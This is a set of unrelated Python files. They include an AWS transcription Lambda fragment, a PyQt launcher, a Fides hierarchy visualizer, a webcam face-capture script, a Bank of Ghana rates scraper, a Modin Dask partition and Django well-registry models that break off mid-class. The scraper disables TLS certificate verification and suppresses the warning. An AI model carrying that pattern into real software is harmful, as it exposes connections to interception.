            'MediaFileUri': f"https://{s3_host}/{bucket_name}/{object_key}"
        },
        'Settings': transcription_job_settings,
        'OutputBucketName': os.environ['TRANSCRIPTIONS_OUTPUT_BUCKET'],
        'Tags': [
            {
                'Key': 'Project',
                'Value': 'serverless-transcribe'
            }
        ]
    }
    if language_code == 'IdentifyLanguage':
        job_params['IdentifyLanguage'] = True
    else:
        job_params['LanguageCode'] = language_code
    if channel_identification != 'On':
        # job_params['Settings'] references this same dict, so the update is
        # visible in job_params as well.
        transcription_job_settings['MaxSpeakerLabels'] = max_speaker_labels
    # FIX: use .get() so a missing (as opposed to empty) JOB_TAG_* variable
    # no longer raises KeyError — the tag pair is optional.
    if os.environ.get('JOB_TAG_KEY') and os.environ.get('JOB_TAG_VALUE'):
        job_params['Tags'].append({
            'Key': os.environ['JOB_TAG_KEY'],
            'Value': os.environ['JOB_TAG_VALUE']
        })
    print(f"Job parameters: {job_params}")
    transcribe.start_transcription_job(**job_params)
    ses.send_email(
        Source=os.environ['NOTIFICATION_SOURCE_EMAIL_ADDRESS'],
        Destination={
            'ToAddresses': [
                notification_email
            ]
        },
        Message={
            'Subject': {
                'Data': f"Transcription has started for {object_key}",
                'Charset': 'UTF-8'
            },
            'Body': {
                'Text': {
                    'Data': 'An email will be sent when it completes.',
                    'Charset': 'UTF-8'
                }
            }
        }
    )
|
import sys
from PyQt5 import QtWidgets
from src.config import Window
if __name__ == "__main__":
    app = QtWidgets.QApplication(sys.argv)
    # NOTE(review): window.show() is never called here — presumably Window
    # shows itself in __init__; confirm, otherwise the app runs invisibly.
    window = Window()
    sys.exit(app.exec_())
"""
Creates data visualizations for hierarchical Fides resource types.
"""
from typing import Generator, List, Dict
import plotly
import plotly.graph_objects as go
from fidesctl.core import config
# Dictionary keys read from each taxonomy entry when building the figures.
FIDES_KEY_NAME = "fides_key"
FIDES_PARENT_NAME = "parent_key"
def hierarchy_figures(
    categories: List[dict],
    resource_type: str,
    json_out: bool = False,
    condensed_html: bool = False,
) -> str:
    """
    Generate html to display a hierarchy with several representation options.
    Args:
        categories: list of the dictionaries for each taxonomy member
        resource_type: the name of the resource type
        json_out: Flag to return a json representation of the visualization
        condensed_html: Flag to condense the result html by pointing to a cdn
            for the plotly js instead of embedding it
    Returns:
        Json representation of the figure if `json_out` is True, html otherwise
    """
    source = []
    target = []
    labels = []
    parents = []
    fides_key_dict = {}
    # build assets/relationships for figures
    for i, category in enumerate(categories):
        # get sunburst labels and parents; use .get so a root entry that has
        # no parent_key at all no longer raises KeyError — the guard further
        # down already treats a missing/empty parent_key as "no parent"
        labels.append(category[FIDES_KEY_NAME])
        parents.append(category.get(FIDES_PARENT_NAME, ""))
        # build sankey mapping
        fides_key_dict[category[FIDES_KEY_NAME]] = i
        # assign colors for grouping in sunburst chart
        category["color"] = category[FIDES_KEY_NAME].split(".")[0]
        # get source and target paths for sankey and icicle graphs
        if FIDES_PARENT_NAME in category and category[FIDES_PARENT_NAME]:
            source.append(fides_key_dict[category[FIDES_PARENT_NAME]])
            target.append(fides_key_dict[category[FIDES_KEY_NAME]])
    # Three alternative traces share one figure; only one is visible at a
    # time, toggled by the update-menu buttons defined below.
    fig_data = [
        go.Sunburst(labels=labels, parents=parents, hoverinfo="skip"),
        go.Sankey(
            valueformat=".1f",
            valuesuffix="%",
            node=dict(
                pad=15,
                thickness=20,
                line=dict(color="black", width=0.5),
                label=list(fides_key_dict.keys()),
                color="blue",  # Maybe make this 'ethyca blue'?
                # hovertemplate="%{label}",
            ),
            # NOTE(review): value=target uses node indices as link magnitudes —
            # presumably a placeholder weighting; confirm intended values.
            link=dict(source=source, target=target, value=target),
            visible=False,
            hoverinfo="skip",
        ),
        go.Icicle(labels=labels, parents=parents, visible=False, hoverinfo="skip"),
    ]
    fig = dict(
        data=fig_data,
        layout=dict(
            title=f'Fides {resource_type.replace("_", " ").title()} Hierarchy',
            showlegend=False,
            updatemenus=list(
                [
                    dict(
                        active=0,
                        buttons=list(
                            [
                                dict(
                                    label="Sunburst",
                                    method="update",
                                    args=[{"visible": [True, False, False]}],
                                ),
                                dict(
                                    label="Sankey",
                                    method="update",
                                    args=[{"visible": [False, True, False]}],
                                ),
                                dict(
                                    label="Icicle",
                                    method="update",
                                    args=[{"visible": [False, False, True]}],
                                ),
                            ]
                        ),
                    )
                ]
            ),
        ),
    )
    if json_out:
        return plotly.io.to_json(fig)
    return plotly.io.to_html(
        fig, include_plotlyjs="cdn" if condensed_html else True, full_html=True
    )
def create_hierarchical_dict(data: dict, keys: List) -> None:
    """
    Create a nested dictionary given a list of strings as a key path.
    Walks `data` along `keys`, creating an empty dict at every missing level,
    so the full path exists afterwards (leaf values are empty dicts).
    Args:
        data: Dictionary to contain the nested dictionary as it's built
        keys: List of keys that equates to the 'path' down the nested dictionary
    Returns:
        None
    """
    for key in keys:
        # setdefault both creates a missing level and descends into it.
        # The previous implementation had two defects: after creating a
        # missing level it never descended (so deeper keys landed at the
        # wrong depth), and on reaching an already-present final key it
        # reset it to {}, wiping any children added earlier.
        data = data.setdefault(key, {})
def convert_categories_to_nested_dict(categories: List[dict]) -> dict:
    """
    Convert a catalog yaml file into a hierarchical nested dictionary.
    Leaf nodes map to empty dictionaries, e.g.:
    {Parent1:
        {
        Child1: {},
        Child2: {},
        Parent2: {
            Child3: {}
            }
        }
    }
    Args:
        categories : list of dictionaries containing each entry from a catalog yaml file
    """
    tree: Dict[Dict, Dict] = {}
    for entry in categories:
        if FIDES_PARENT_NAME in entry:
            # Entry has a parent: expand its dotted key into a path and
            # materialize every level of that path in the tree.
            create_hierarchical_dict(tree, entry[FIDES_KEY_NAME].split("."))
        else:
            # Top-level entry: becomes a root of the tree.
            tree[entry[FIDES_KEY_NAME]] = {}
    return tree
def nest_to_html(nested_dict: dict, indent_factor: int) -> Generator:
    """
    Yield HTML fragments for the keys of a nested dictionary.
    Args:
        nested_dict: nested dictionary whose keys become list items
        indent_factor: spacing multiplier (one space per level)
    Yields:
        Lines of an indented, unordered HTML list.
    """
    pad = " " * indent_factor
    for name, children in nested_dict.items():
        yield f"{pad}<li>{name}</li>"
        if isinstance(children, dict):
            inner = "\n".join(nest_to_html(children, indent_factor + 1))
            yield f"{pad}<ul>\n{inner}\n{pad}</ul>"
def nested_categories_to_html_list(
    categories: List[dict], resource_type: str, indent: int = 1
) -> str:
    """
    Render the taxonomy as an HTML unordered list.
    Args:
        categories: list of the dictionaries for each taxonomy member
        resource_type: the name of the resource type
        indent: spacing multiplier
    Returns:
        A header followed by the nested list markup.
    """
    tree = convert_categories_to_nested_dict(categories)
    title = resource_type.replace("_", " ").title()
    body = "\n".join(nest_to_html(tree, indent))
    return f"<h2>Fides {title} Hierarchy</h2>\n{body}"
def get_visualize_url(resource_type: str, visualize_type: str) -> str:
    """
    Get the url to the resource visualization web page.
    Args:
        resource_type: Type of data fides resource ["data_category", "data_qualifier", "data_use"]
        visualize_type: type of UI to get a link to ["sankey", "sunburst", "text"]
    Returns:
        url string to the visualization
    """
    settings = config.get_config()
    # Route shape: <server>/<resource>/visualize/<ui-kind>
    return f"{settings.cli.server_url}/{resource_type}/visualize/{visualize_type}"
|
import cv2
import numpy as np
# Face-capture enrollment script: shows the webcam feed with face/eye boxes
# drawn, and on each 'q' keypress saves a resized grayscale face crop as a
# numbered training image under fotos/ for the entered person identifier.
classificador = cv2.CascadeClassifier("haarcascade-frontalface-default.xml")
classificadorOlhos = cv2.CascadeClassifier("haarcascade-eye.xml")
camera = cv2.VideoCapture(0)
amostra = 1
# Stop after this many samples have been captured.
numeroAmostra = 25
# NOTE(review): `id` shadows the builtin of the same name; only used as a label here.
id = input('Digite o seu identificador: ')
# Output crop size (width, height) in pixels.
largura, altura = 220, 220
print("Capturando as faces.....")
while (True):
    conectado, imagem = camera.read()
    if (conectado is True):
        imagemcinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY)
        # print(np.average(imagemcinza))
        facesDetectadas = classificador.detectMultiScale(imagemcinza, scaleFactor= 1.5,minSize=(100,100))
        for (x, y, l, a) in facesDetectadas:
            # Outline the detected face on the color frame.
            cv2.rectangle(imagem, (x, y), (x + l, y + a), (0, 0, 255), 2)
            regiao = imagem[y:y + a, x:x + l]
            regiaoCinzaOlho = cv2.cvtColor(regiao, cv2.COLOR_BGR2GRAY)
            olhosDetectados = classificadorOlhos.detectMultiScale(regiaoCinzaOlho)
            for (ox, oy, ol, oa) in olhosDetectados:
                cv2.rectangle(regiao, (ox, oy), (ox + ol, oy + oa), (0, 255, 0), 2)
            # Capture a sample only on 'q' keypress, and only when the frame
            # is bright enough (mean gray level > 110) to be usable.
            if cv2.waitKey(1) & 0xFF == ord('q'):
                if np.average(imagemcinza) > 110:
                    imagemFace = cv2.resize(imagemcinza[y:y + a, x:x + l], (largura, altura))
                    cv2.imwrite("fotos/pessoa." + str(id) + "." + str(amostra) + ".jpg", imagemFace)
                    print("[foto " + str(amostra) + " capturada com sucesso")
                    amostra +=1
        cv2.imshow("Face", imagem)
        # cv2.waitKey(1)
        if (amostra >= numeroAmostra + 1):
            break
print("Faces capturadas com sucesso")
camera.release()
cv2.destroyAllWindows()
|
# python scraperv2.py https://www.bog.gov.gh/treasury-and-the-markets/treasury-bill-rates/
# python scraperv2.py https://www.bog.gov.gh/treasury-and-the-markets/historical-interbank-fx-rates/
import requests
from bs4 import BeautifulSoup as bs
import urllib3
from _datetime import datetime
import csv
import sys
from time import sleep
import argparse
import os
# Silence the warning triggered by the verify=False requests made below.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# wpDataTables AJAX endpoint; the table id is appended per request.
BASE_URL = 'https://www.bog.gov.gh/wp-admin/admin-ajax.php?action=get_wdtable&table_id'
def mkdir(path):
    """
    Create directory `path` (and any missing parents) if it does not exist,
    otherwise report that it is already present.
    """
    if not os.path.exists(path):
        os.makedirs(path)
    else:
        # Fixed: the old message mixed a literal '%s' placeholder into an
        # f-string, printing " * Directory %s already exists = <path>".
        print(f' * Directory already exists = {path}')
# def argparser():
# '''
# argparser defnition
# '''
# parser = argparse.ArgumentParser(description='Bank of Ghana FX Rates')
# parser.add_argument('--url',
# default='https://www.bog.gov.gh/treasury-and-the-markets/historical-interbank-fx-rates/',
# type=str,
# help='URL to page to scrap')
#
# #parser.add_argument('--dataFolder', default='', type=str, help='Where to output historical data')
#
# args = parser.parse_args()
# return args
#
# args = argparser()
def scrape_table(url=''):
    '''Scrape every row of the wpDataTable behind `url`.
    Pages through the AJAX endpoint in `length`-sized chunks until an empty
    page is returned, then sorts rows newest-first by the date in column 0
    when that column parses as a date.
    Returns {'name', 'data', 'headers'} or None when the page has no table.
    '''
    if url == '':
        url = 'https://www.bog.gov.gh/treasury-and-the-markets/historical-interbank-fx-rates/'
    table = get_table_info(url)
    if table is None:
        return
    draw = 1
    start = 0
    length = 10000
    lines = []
    while True:
        try:
            response = send_request(table['wdtNonce'], table['id'], draw, start, length)
            if len(response['data']) > 0:
                lines.extend(response['data'])
                start += length
            else:
                break
        except Exception:
            # Narrowed from a bare `except:` so Ctrl-C (KeyboardInterrupt)
            # and SystemExit can still stop the retry loop.
            print('Unsuccessful request. Trying again in few seconds.')
            sleep(5)
    try:
        lines.sort(key=lambda x: datetime.strptime(x[0], '%d %b %Y'), reverse=True)
    except (ValueError, TypeError, IndexError):
        # First column is not a parsable date for this table; keep API order.
        pass
    return {'name': table['name'], 'data': lines, 'headers': table['headers']}
def get_table_info(url):
    '''Get table information'''
    # Fetch the page, locate the wpDataTable markup and the nonce the AJAX
    # endpoint requires. Returns {'name', 'id', 'wdtNonce', 'headers'} or
    # None when the page does not contain the expected table/input elements.
    print('Loading table id...')
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
        " Chrome/85.0.4183.121 Safari/537.36"
    }
    # verify=False: the site's TLS chain fails validation; warnings are
    # silenced at module import time.
    html = requests.get(url, headers=headers, verify=False).text
    soup = bs(html, 'lxml')
    table = soup.find('table', id='table_1')
    input_wdt = soup.find('input', id='wdtNonceFrontendEdit')
    if table is None or input_wdt is None:
        print('Non-generic table url. Please contact developer.')
        return None
    # Derive a file-friendly name from the last non-empty path segment.
    if url[-1] in '/':
        name = url.split('/')[-2]
    else:
        name = url.split('/')[-1]
    table_id = table['data-wpdatatable_id']
    headers = []
    for header in table.find('thead').find('tr').find_all('th'):
        headers.append(header.get_text().strip())
    wdt_nonce = input_wdt['value']
    table_info = {'name': name, 'id': table_id, 'wdtNonce': wdt_nonce, 'headers': headers}
    print(f'Table id is {table_id}')
    return table_info
def send_request(wdt, table_id, draw, start, length):
    '''send request to scrape page'''
    # POST one page of rows (offset `start`, page size `length`) to the
    # wpDataTables AJAX endpoint and return the parsed JSON payload.
    # `wdt` is the nonce extracted by get_table_info; `draw` is the
    # DataTables request counter.
    print('Scraping data from API...')
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
        " Chrome/85.0.4183.121 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept": "application/json, text/javascript, */*; q=0.01",
    }
    data = {
        "draw": draw,
        "wdtNonce": wdt,
        "start": start,
        "length": length
    }
    response = requests.post(f'{BASE_URL}={table_id}',headers=headers, data=data, verify=False)
    return response.json()
def save_csv(name, headers, lines):
    '''Write the scraped header row and data rows to `<name>.csv` (UTF-8).'''
    print('Saving results in csv...')
    out_path = f"{name}.csv"
    with open(out_path, "w", newline='', encoding="utf-8") as handle:
        writer = csv.writer(handle, quoting=csv.QUOTE_MINIMAL)
        writer.writerow(headers)
        writer.writerows(lines)
    print(f'{out_path} saved! Total records: {len(lines)}')
class RatesURL(object):
    """Mutable holder for the URL that should be scraped."""
    def __init__(self, url=''):
        self.url = url
    def getUrl(self):
        """Return the currently configured URL string."""
        return self.url
    def setUrl(self, url):
        """Point the holder at a different URL."""
        self.url = url
def run(url):
    # Scrape the table behind `url` (a RatesURL) and dump it to <name>.csv.
    # Falls back to scrape_table's default interbank-FX page when the wrapped
    # string is not an https URL.
    #if len(sys.argv) > 1 and 'https://' in sys.argv[1]:
    #url = sys.argv[1].strip()
    #url = args.url
    #url = RatesURL(url)
    if 'https://' in url.getUrl():
        table = scrape_table(str(url.getUrl()))
    else:
        table = scrape_table()
    if table is not None:
        save_csv(table['name'], table['headers'], table['data'])
if __name__ == '__main__':
    # Default target: the treasury-bill rates table (see the usage examples
    # in the comments at the top of this file).
    url = RatesURL()
    url.setUrl('https://www.bog.gov.gh/treasury-and-the-markets/treasury-bill-rates/')
    run(url)
|
# Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import pandas
from modin.engines.base.frame.partition import BaseFramePartition
from modin.data_management.utils import length_fn_pandas, width_fn_pandas
class DaskFramePartition(BaseFramePartition):
    """Modin frame partition whose data lives behind a dask.delayed object."""
    def __init__(self, dask_obj, func=None):
        import dask
        # The raw wrapped object; kept so later calls can re-wrap it.
        self.dask_obj = dask_obj
        # Either the raw object, or `func` (a (callable, kwargs) pair)
        # lazily bound to it via dask.delayed.
        self.delayed_call = (
            dask_obj if func is None else dask.delayed(func[0])(dask_obj, **func[1])
        )
    def get(self):
        """Return the object wrapped by this one to the original format.
        Note: This is the opposite of the classmethod `put`.
        E.g. if you assign `x = BaseFramePartition.put(1)`, `x.get()` should
        always return 1.
        Returns:
            The object that was `put`.
        """
        # NOTE(review): this resets delayed_call to the bare wrapped object
        # before computing, which discards any call queued via
        # add_to_apply_calls or the __init__ func — confirm this is intended.
        self.delayed_call = self.dask_obj
        return self.delayed_call.compute()
    def apply(self, func, **kwargs):
        """Apply some callable function to the data in this partition.
        Note: It is up to the implementation how kwargs are handled. They are
        an important part of many implementations. As of right now, they
        are not serialized.
        Args:
            func: The lambda to apply (may already be correctly formatted)
        Returns:
            A new `BaseFramePartition` containing the object that has had `func`
            applied to it.
        """
        import dask
        # applies the func lazily
        delayed_call = self.delayed_call
        # Reset this partition's pending call chain; the new partition below
        # owns the composed computation.
        self.delayed_call = self.dask_obj
        return self.__class__(dask.delayed(func)(delayed_call, **kwargs))
    def add_to_apply_calls(self, func, **kwargs):
        """Add the function to the apply function call stack.
        This function will be executed when apply is called. It will be executed
        in the order inserted; apply's func operates the last and return
        """
        import dask
        self.delayed_call = dask.delayed(func)(self.delayed_call, **kwargs)
        return self
    def to_pandas(self):
        """Convert the object stored in this partition to a Pandas DataFrame.
        Assumes the underlying object is a Pandas DataFrame and simply calls `get`
        Returns:
            A Pandas DataFrame.
        """
        return self.get()
    @classmethod
    def put(cls, obj):
        """A factory classmethod to format a given object.
        Args:
            obj: An object.
        Returns:
            A `RemotePartitions` object.
        """
        import dask
        # simply wrap the input object by dask.delayed
        return cls(dask.delayed(obj))
    @classmethod
    def preprocess_func(cls, func):
        """Preprocess a function before an `apply` call.
        Note: This is a classmethod because the definition of how to preprocess
        should be class-wide. Also, we may want to use this before we
        deploy a preprocessed function to multiple `BaseFramePartition`
        objects.
        Args:
            func: The function to preprocess.
        Returns:
            An object that can be accepted by `apply`.
        """
        # seems that dask does not need any pre-processing
        return func
    @classmethod
    def length_extraction_fn(cls):
        # Callable used by the partition manager to measure row counts.
        return length_fn_pandas
    @classmethod
    def width_extraction_fn(cls):
        # Callable used by the partition manager to measure column counts.
        return width_fn_pandas
    @classmethod
    def empty(cls):
        # An empty partition: a delayed, empty pandas DataFrame.
        return cls.put(pandas.DataFrame())
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import uuid
import datetime
import logging
from django.db import models
from django.contrib.auth import get_user_model
from gwells.models import AuditModel, ProvinceStateCode
# Module-level handles: the project's active user model and this module's logger.
User = get_user_model()
logger = logging.getLogger(__name__)
class ActivityCode(AuditModel):
    """
    Restricted Activity related to drilling wells and installing well pumps.
    """
    # Code value is the primary key; editable=False keeps it out of forms.
    registries_activity_code = models.CharField(
        primary_key=True, max_length=10, editable=False)
    description = models.CharField(max_length=100)
    display_order = models.PositiveIntegerField()
    # Validity window; an unset expired_date means the code is still active.
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_activity_code'
        ordering = ['display_order', 'description']
        verbose_name_plural = 'Activity codes'
    def __str__(self):
        return self.description
class SubactivityCode(AuditModel):
    """
    Restricted Activity Subtype related to drilling wells and installing well pumps.
    """
    registries_subactivity_code = models.CharField(
        primary_key=True,
        max_length=10,
        editable=False)
    # Parent activity; PROTECT blocks deleting an activity still referenced here.
    registries_activity = models.ForeignKey(
        ActivityCode,
        db_column='registries_activity_code',
        on_delete=models.PROTECT)
    description = models.CharField(max_length=100)
    display_order = models.PositiveIntegerField()
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_subactivity_code'
        ordering = ['display_order', 'description']
        verbose_name_plural = 'Subactivity codes'
    def __str__(self):
        return self.description
class CertifyingAuthorityCode(AuditModel):
    """Code table of authorities that issue accredited certificates."""
    cert_auth_code = models.CharField(
        primary_key=True,
        max_length=50,
        editable=False,
        verbose_name="Certifying Authority Name")
    description = models.CharField(max_length=100, blank=True, null=True)
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_certifying_authority_code'
        ordering = ['cert_auth_code']
        verbose_name_plural = 'Certifying Authorities'
    def __str__(self):
        return self.cert_auth_code
class AccreditedCertificateCode(AuditModel):
    """A certificate recognized for a registry activity, issued by a certifying authority."""
    acc_cert_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Accredited Certificate UUID")
    cert_auth = models.ForeignKey(
        CertifyingAuthorityCode,
        db_column='cert_auth_code',
        on_delete=models.PROTECT)
    registries_activity = models.ForeignKey(
        ActivityCode,
        db_column='registries_activity_code',
        on_delete=models.PROTECT)
    name = models.CharField(max_length=100, editable=False,
                            verbose_name="Certificate Name")
    description = models.CharField(max_length=100, blank=True, null=True)
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_accredited_certificate_code'
        ordering = ['registries_activity', 'cert_auth']
        verbose_name_plural = 'Accredited Certificates'
    def __str__(self):
        return '%s %s %s' % (self.cert_auth, self.registries_activity, self.name)
class Organization(AuditModel):
    """A company that registered people (see Register.organization) belong to."""
    org_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Organization UUID")
    name = models.CharField(max_length=200)
    street_address = models.CharField(
        max_length=100, null=True, verbose_name='Street Address')
    city = models.CharField(max_length=50, null=True, verbose_name='Town/City')
    province_state = models.ForeignKey(
        ProvinceStateCode,
        db_column='province_state_code',
        on_delete=models.PROTECT,
        verbose_name='Province/State',
        related_name="companies")
    postal_code = models.CharField(
        max_length=10, null=True, verbose_name='Postal Code')
    main_tel = models.CharField(
        null=True, max_length=15, verbose_name="Telephone number")
    fax_tel = models.CharField(
        null=True, max_length=15, verbose_name="Fax number")
    website_url = models.URLField(null=True, verbose_name="Website")
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    # Fixed user-facing typo in verbose_name: "adddress" -> "address".
    email = models.EmailField(
        blank=True, null=True, verbose_name="Email address")
    class Meta:
        db_table = 'registries_organization'
        ordering = ['name']
        verbose_name_plural = 'Organizations'
    def __str__(self):
        return self.name
    @property
    def org_verbose_name(self):
        """Name plus a location suffix for display purposes."""
        prov = self.province_state.province_state_code
        # display either "City, Province" or just "Province"
        location = '{}, {}'.format(
            self.city, prov) if self.city is not None else prov
        return '{} ({})'.format(self.name, location)
class Person(AuditModel):
    """An individual tracked by the registries (well driller / pump installer contexts)."""
    person_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Person UUID")
    first_name = models.CharField(max_length=100)
    surname = models.CharField(max_length=100)
    # As per D.A. - temporary fields to hold compliance-related details
    well_driller_orcs_no = models.CharField(
        max_length=25,
        blank=True,
        null=True,
        verbose_name='ORCS File # reference (in context of Well Driller).')
    pump_installer_orcs_no = models.CharField(
        max_length=25,
        blank=True,
        null=True,
        verbose_name='ORCS File # reference (in context of Pump Installer).')
    # contact information
    contact_tel = models.CharField(
        blank=True,
        null=True,
        max_length=15,
        verbose_name="Contact telephone number")
    contact_cell = models.CharField(
        blank=True,
        null=True,
        max_length=15,
        verbose_name="Contact cell number")
    contact_email = models.EmailField(
        blank=True, null=True, verbose_name="Email address")
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_person'
        ordering = ['first_name', 'surname']
        verbose_name_plural = 'People'
    def __str__(self):
        return '%s %s' % (self.first_name, self.surname)
    @property
    def name(self):
        # Convenience: same "First Surname" form as __str__.
        return '%s %s' % (self.first_name, self.surname)
class ContactInfo(AuditModel):
    """A set of contact details (phone/cell/email) attached to a Person."""
    contact_detail_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Contact At UUID")
    person = models.ForeignKey(
        Person,
        db_column='person_guid',
        on_delete=models.PROTECT,
        verbose_name="Person Reference",
        related_name="contact_info")
    contact_tel = models.CharField(
        blank=True,
        null=True,
        max_length=15,
        verbose_name="Contact telephone number")
    contact_cell = models.CharField(
        blank=True,
        null=True,
        max_length=15,
        verbose_name="Contact cell number")
    # Fixed user-facing typo in verbose_name: "adddress" -> "address".
    contact_email = models.EmailField(
        blank=True, null=True, verbose_name="Email address")
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_contact_detail'
        verbose_name_plural = 'Contact Information'
    def __str__(self):
        return '%s - %s, %s' % (
            self.person,
            self.contact_tel,
            self.contact_email)
class WellClassCode(AuditModel):
    """
    Class of Wells, classifying the type of wells and activities/subactivies permitted
    """
    registries_well_class_code = models.CharField(
        primary_key=True, max_length=10, editable=False)
    description = models.CharField(max_length=100)
    display_order = models.PositiveIntegerField()
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_well_class_code'
        ordering = ['display_order', 'description']
        verbose_name_plural = 'Well Classes'
    def __str__(self):
        # Display the code itself, not the description (unlike other code tables).
        return self.registries_well_class_code
class Qualification(AuditModel):
    """
    Qualification of Well Class for a given Activity/SubActivity.
    """
    registries_well_qualification_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Qualification / Well Class UUID")
    well_class = models.ForeignKey(
        WellClassCode,
        db_column='registries_well_class_code',
        on_delete=models.PROTECT)
    subactivity = models.ForeignKey(
        SubactivityCode,
        db_column='registries_subactivity_code',
        on_delete=models.PROTECT,
        related_name="qualification_set")
    display_order = models.PositiveIntegerField()
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_well_qualification'
        ordering = ['subactivity', 'display_order']
        verbose_name_plural = 'Qualification codes'
    def __str__(self):
        return self.well_class.registries_well_class_code
class RegistriesStatusCode(AuditModel):
    """
    Status of the Register Entry
    """
    registries_status_code = models.CharField(
        primary_key=True, max_length=10, editable=False)
    description = models.CharField(max_length=100)
    display_order = models.PositiveIntegerField()
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_status_code'
        ordering = ['display_order', 'description']
        verbose_name_plural = 'Registry Status Codes'
    def __str__(self):
        return self.description
class RegistriesRemovalReason(AuditModel):
    """
    Possible Reasons for Removal from either of the Registers
    """
    registries_removal_reason_code = models.CharField(
        primary_key=True, max_length=10, editable=False)
    description = models.CharField(max_length=100)
    display_order = models.PositiveIntegerField()
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_removal_reason_code'
        ordering = ['display_order', 'description']
        verbose_name_plural = 'Registry Removal Reasons'
    def __str__(self):
        return self.description
class Register(AuditModel):
    """A person's entry in a registry for one activity (driller / pump installer)."""
    # Default status code applied to new register entries.
    PENDING = 'P'
    register_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Register UUID")
    registries_activity = models.ForeignKey(
        ActivityCode,
        db_column='registries_activity_code',
        on_delete=models.PROTECT)
    person = models.ForeignKey(Person, db_column='person_guid',
                               on_delete=models.PROTECT, related_name="registrations")
    organization = models.ForeignKey(
        Organization, blank=True,
        db_column='organization_guid',
        null=True, on_delete=models.PROTECT,
        related_name="registrations")
    status = models.ForeignKey(
        RegistriesStatusCode,
        db_column='registries_status_code',
        on_delete=models.PROTECT,
        default=PENDING,
        verbose_name="Register Entry Status")
    registration_no = models.CharField(max_length=15, blank=True, null=True)
    registration_date = models.DateField(blank=True, null=True)
    register_removal_reason = models.ForeignKey(
        RegistriesRemovalReason,
        db_column='registries_removal_reason_code',
        on_delete=models.PROTECT,
        blank=True,
        null=True,
        verbose_name="Removal Reason")
    register_removal_date = models.DateField(
        blank=True,
        null=True,
        verbose_name="Date of Removal from Register")
    class Meta:
        db_table = 'registries_register'
        verbose_name_plural = 'Registrations'
    def __str__(self):
        return '%s - %s' % (
            self.person,
            self.registries_activity
        )
class ApplicationStatusCode(AuditModel):
    """
    Status of Applications for the Well Driller and Pump Installer Registries
    """
    registries_application_status_code = models.CharField(
        primary_key=True, max_length=10, editable=False)
    description = models.CharField(max_length=100)
    display_order = models.PositiveIntegerField()
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_application_status_code'
        ordering = ['display_order', 'description']
        verbose_name_plural = 'Application Status Codes'
    def __str__(self):
        return self.description
class ProofOfAgeCode(AuditModel):
    """
    List of documents that can be used to identify (the age of) an applicant
    """
    registries_proof_of_age_code = models.CharField(
        primary_key=True, max_length=10, editable=False)
    description = models.CharField(max_length=100)
    display_order = models.PositiveIntegerField()
    effective_date = models.DateField(default=datetime.date.today)
    expired_date = models.DateField(blank=True, null=True)
    class Meta:
        db_table = 'registries_proof_of_age_code'
        ordering = ['display_order', 'description']
        verbose_name_plural = 'ProofOfAgeCodes'
    def __str__(self):
        return self.registries_proof_of_age_code
class RegistriesApplication(AuditModel):
    """
    Application from a well driller or pump installer to be on the GWELLS Register.
    """
    application_guid = models.UUIDField(
        primary_key=True,
        default=uuid.uuid4,
        editable=False,
        verbose_name="Register Application UUID")
    registration = models.ForeignKey(
        Register,
        db_column='register_guid',
        on_delete=models.PROTECT,
        verbose_name="Person Reference",
        related_name='applications')
    subactivity = models.ForeignKey(
        SubactivityCode,
        db_column='registries_subactivity_code',
        on_delete=models.PROTECT,
        related_name="applications")
    file_no = models.CharField(
